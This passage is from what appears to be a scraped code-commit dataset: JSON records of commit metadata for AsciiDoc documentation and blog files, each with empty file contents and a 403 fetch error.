image.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_images\/sti_images\/java.adoc","new_file":"using_images\/sti_images\/java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9425a508c6f72d3d632e3a30958a5ce5fc51c998","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker\/http-response.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker\/http-response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"378f09ae8a6167e369bff4f1ee8dfbca7aef5afc","subject":"Documentation on tree merge function","message":"Documentation on tree merge function\n","repos":"bio-org-au\/services,bio-org-au\/services,bio-org-au\/services","old_file":"doc\/merge-tree.adoc","new_file":"doc\/merge-tree.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bio-org-au\/services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee3a22cbe3d0b9d855ba6915970226e1c116463e","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ad74b1dd64d3a35ef3eb6de44b6d85cee869489","subject":"Update 2017-10-25-Creation-dun-mail-HTML.adoc","message":"Update 2017-10-25-Creation-dun-mail-HTML.adoc","repos":"kosssi\/blog,kosssi\/blog,kosssi\/blog,kosssi\/blog","old_file":"_posts\/2017-10-25-Creation-dun-mail-HTML.adoc","new_file":"_posts\/2017-10-25-Creation-dun-mail-HTML.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kosssi\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20dc752995af6e99af82481f38f6ed1368b059bf","subject":"Added README.","message":"Added README.\n","repos":"jprichardson\/buzz,jprichardson\/buzz","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jprichardson\/buzz.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e6dae4175489f90aa834b5ba22127eda82d8a75","subject":"compiled and fixed programs","message":"compiled and fixed programs\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7be1c3f08f22691a28118b8b59f013574a5be81c","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eaaec9fe91a4c19eb7e3d7c14a430b7ab325dc0","subject":"Update 2015-10-31-The-Lost-Days.adoc","message":"Update 
2015-10-31-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-31-The-Lost-Days.adoc","new_file":"_posts\/2015-10-31-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c4c045606f83e0bfcb81e7dfce9260500217f4d","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f39fae2b37a5571f595b817a035794403b90d28","subject":"lecture #2: ip addressing & conversion hex\/bin\/dec","message":"lecture #2: ip addressing & conversion hex\/bin\/dec\n\nlecture #1 is on paper still\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture01_20170830.adoc","new_file":"lecture01_20170830.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfea66529915a125d0a3f69da45dc31fb5c045cb","subject":"Update 2017-05-17-Editeur-CSS-dans-Eclipse.adoc","message":"Update 2017-05-17-Editeur-CSS-dans-Eclipse.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2017-05-17-Editeur-CSS-dans-Eclipse.adoc","new_file":"_posts\/2017-05-17-Editeur-CSS-dans-Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74b20853be901b2f78b7829c98c1f5a4584680f3","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c0b42ccd74cd70f59170a39fe1f3edc53e740cb","subject":"Reformat: FAQs \u2192 Tips & Tricks","message":"Reformat: FAQs \u2192 Tips & Tricks\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 
403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a6dc620b00a7272807d8a8d4d78f355689cbd22d","subject":"CL note: Checking if a file or directory exists","message":"CL note: Checking if a file or directory exists\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3860c533ab6a52a888793ae9e6c209b15f5c3ed4","subject":"cl: string to symbol and function","message":"cl: string to symbol and function\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0d8ddbf03dffcba616ed020072324c05f48a1801","subject":"Updated doc\/INTRODUCTION.adoc","message":"Updated doc\/INTRODUCTION.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/INTRODUCTION.adoc","new_file":"doc\/INTRODUCTION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b981848e2b97e3540470d747ff39ca1c01a8bdec","subject":"Update 2015-05-04-Hello-World.adoc","message":"Update 2015-05-04-Hello-World.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-04-Hello-World.adoc","new_file":"_posts\/2015-05-04-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1237535963ef57edcb01b8f9b6b24a28c2fad3b","subject":"Update 2016-03-02-My-new-post.adoc","message":"Update 2016-03-02-My-new-post.adoc","repos":"sharmivssharmi\/sharmipress,sharmivssharmi\/sharmipress,sharmivssharmi\/sharmipress,sharmivssharmi\/sharmipress","old_file":"_posts\/2016-03-02-My-new-post.adoc","new_file":"_posts\/2016-03-02-My-new-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sharmivssharmi\/sharmipress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3faf34f58c68a4f6a3fbad42ff1650729bc847e3","subject":"Update 2016-07-09-Version-166.adoc","message":"Update 2016-07-09-Version-166.adoc","repos":"eunas\/eunas.github.io,eunas\/eunas.github.io,eunas\/eunas.github.io,eunas\/eunas.github.io","old_file":"_posts\/2016-07-09-Version-166.adoc","new_file":"_posts\/2016-07-09-Version-166.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eunas\/eunas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"ec854d9d2786f9229a556e1fbb306bcabf78f728","subject":"\u91cd\u8907\u306e\u305f\u3081\u524a\u9664","message":"\u91cd\u8907\u306e\u305f\u3081\u524a\u9664","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2beb848d609071d5075af04fb1339d4b6bc79292","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d048535d26e7d8869b88d402b0dd21d08eef46","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"178ddd0ac3d05f2b43ae16410e98fa4f9909cac1","subject":"add generated file","message":"add generated file\n","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-java\/src\/main\/asciidoc\/dataobjects.adoc","new_file":"rx-java\/src\/main\/asciidoc\/dataobjects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55e8fb5a57a548f9e78fcc1ef4d4b72edaa6141d","subject":"Update 2016-05-04-Second-Post.adoc","message":"Update 2016-05-04-Second-Post.adoc","repos":"lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io","old_file":"_posts\/2016-05-04-Second-Post.adoc","new_file":"_posts\/2016-05-04-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lyqiangmny\/lyqiangmny.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8383df04027fa8a9fdd9b801cc03baca63810509","subject":"y2b create post PlayStation Vita Unboxing (PS Vita)","message":"y2b create post PlayStation Vita Unboxing (PS 
Vita)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-23-PlayStation-Vita-Unboxing-PS-Vita.adoc","new_file":"_posts\/2011-12-23-PlayStation-Vita-Unboxing-PS-Vita.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94c94cb1d59ac0b3b904ada07636297217c0e07d","subject":"Cleaning","message":"Cleaning\n","repos":"CyrilSahula\/REST-API-Doc","old_file":"src\/main\/resources\/doc-api-adoc\/index.adoc","new_file":"src\/main\/resources\/doc-api-adoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CyrilSahula\/REST-API-Doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"71576712f33555dc493dd767bed90b300ae35eb9","subject":"create post What If You Could Get AirPods For Only $40?","message":"create post What If You Could Get AirPods For Only $40?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-What-If-You-Could-Get-AirPods-For-Only-40?.adoc","new_file":"_posts\/2018-02-26-What-If-You-Could-Get-AirPods-For-Only-40?.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84eefa89bf9d738b79e6ec96b5ff72a74135966d","subject":"README: update Eclipse information","message":"README: update Eclipse information\n\nI upgraded to Eclipse 8.7.0. 
They finally fixed the long-standing indexer\nbug that caused indexing LLVM to hang outright, but there are still enough\nindexing errors that it should be excluded.\n\nChange-Id: Id91ecea1af670e5871174884b19662c063e2250c\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7092\nTested-by: jenkins\nReviewed-by: David Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fe2d30c88de984cf7d7805c7949310103b73bf6","subject":"Adding a README","message":"Adding a README\n","repos":"danhaywood\/java-assertjext,danhaywood\/java-assertjext","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danhaywood\/java-assertjext.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9bfc5dd90ec68aa560f79326e3567a858866cb5","subject":"Metrics specific logging conventions doc","message":"Metrics specific logging conventions doc\n","repos":"jotak\/hawkular-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,jotak\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,spadgett\/hawkular-metrics,tsegismont\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,pilhuhn\/rhq-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,pilhuhn\/rhq-metrics","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94145a86efc4abde844798de2ef4d0085e1691e2","subject":"Update 2015-02-24-new-post.adoc","message":"Update 2015-02-24-new-post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-new-post.adoc","new_file":"_posts\/2015-02-24-new-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42a383131353c4a94a0fd7a5ef4b93b7d98ca5e5","subject":"Update 2017-08-23-githooks.adoc","message":"Update 2017-08-23-githooks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-githooks.adoc","new_file":"_posts\/2017-08-23-githooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a82925b3bd6f4a8e692702ba08724ce9ab8e8ebd","subject":"Updated links to maven repo to use https. Closes elastic\/elasticsearch#495.","message":"Updated links to maven repo to use https. Closes elastic\/elasticsearch#495.\n\nOriginal commit: elastic\/x-pack-elasticsearch@f95bdea57efa59e8e033c946d9c2030930cc467f\n","repos":"vroyer\/elassandra,coding0011\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra","old_file":"shield\/docs\/public\/configuring-clients-integrations\/java.asciidoc","new_file":"shield\/docs\/public\/configuring-clients-integrations\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18c6a2c1f8613e0d40661ead23bfb7005bebbc4c","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-transform-queryparameters","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-transform-queryparameters.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"135f286088136973528584c937d47cef8a0a9f6f","subject":"Add CONTRIBUTING.adoc","message":"Add 
CONTRIBUTING.adoc","repos":"crawsible\/pivnet-resource,pivotal-cf-experimental\/pivnet-resource,pivotal-cf-experimental\/pivnet-resource,crawsible\/pivnet-resource","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crawsible\/pivnet-resource.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01fa4e1496b900ebd5475890f187924bf715e66c","subject":"Update 2017-09-22-Node-Red.adoc","message":"Update 2017-09-22-Node-Red.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-22-Node-Red.adoc","new_file":"_posts\/2017-09-22-Node-Red.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb14522a13f90faeadf0e9b98b0159573755bae0","subject":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","message":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d26269c6c3f1f873367575e4d2e1e685f10ec63","subject":"Update 2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","message":"Update 2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","new_file":"_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ff065b7ff900df66cbda52235d446d76412bd0a","subject":"Spaces","message":"Spaces\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching.adoc","new_file":"Git\/Git branching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3da29e698e5fc1d51fcca315c915c56a3f4a180","subject":"Changed forwarding reference to rvalue reference","message":"Changed forwarding reference to rvalue reference\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"cf9a8ab0b5c119cefc3206085e6449bfa48a7c99","subject":"Added more references","message":"Added more references\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"679f66862b0c62bcbee4ee309df0a52fa67f22fd","subject":"Add instruction on how to install the latest release","message":"Add instruction on how to install the latest release\n","repos":"debbbbie\/asciidoctor-firefox-addon,asciidoctor\/asciidoctor-firefox-addon,Mogztter\/asciidoctor-firefox-addon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mogztter\/asciidoctor-firefox-addon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f1eed830bdecda451cc605a2038cb9156c0ace","subject":"Create do-explore-open-source-projects-fil.adoc","message":"Create do-explore-open-source-projects-fil.adoc\n\nFilipino translation for do-explore-open-source-projects.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-explore-open-source-projects-fil.adoc","new_file":"src\/do\/do-explore-open-source-projects-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da05c69ad52f1686c3e75a9470971bce174d749e","subject":"Update 2016-01-08-Title.adoc","message":"Update 2016-01-08-Title.adoc","repos":"smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io","old_file":"_posts\/2016-01-08-Title.adoc","new_file":"_posts\/2016-01-08-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smirnoffs\/smirnoffs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"363b031b34569f31949971afe834f9723148af84","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 